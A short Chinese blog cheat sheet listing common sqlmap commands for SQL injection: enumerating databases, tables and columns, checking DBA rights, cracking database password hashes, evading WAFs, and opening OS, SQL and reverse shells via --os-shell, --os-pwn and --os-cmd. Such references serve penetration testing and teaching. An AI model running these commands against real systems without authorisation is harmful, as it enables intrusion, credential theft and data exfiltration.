Sqlmap常用命令与参数整理 | 【韩涛博客】

Sqlmap常用命令与参数整理

注入参数

sqlmap.py -u "url" --current-db  //查看当前数据库
sqlmap.py -u "url" --current-user //查看当前用户
sqlmap.py -u "url" --is-dba  //查看当前用户权限是否是DBA
sqlmap.py -u "url" -D 数据库名称 --tables //知道库名猜解表名
sqlmap.py -u "url" -D 数据库名称 -T 表名 --columns   //知道库名、表名解列名
sqlmap.py -r 1.txt //使用POST抓包文件进行注入

常用参数

--level //测试等级(1-5)默认是1,cookie注入是2,http头注入是3
--dbms=mysql/oracle/mssql //指定数据库(这样既可以节省时间,在某些时候也可以绕过waf)
--batch //使用sqlmap默认选项,不用按回车
--random-agent    //使用随机选定的User-Agent头
--passwords //列出并破解数据库用户的hash

Shell相关

--os-pwn    //反弹shell
--os-shell  //交互式系统shell,可以执行cmd命令
--sql-shell //sql-shell,可以执行SQL语句
--os-cmd="id" //执行id系统命令
广告

发表评论 取消回复
表情 图片 链接 代码

分享
×
订阅图标按钮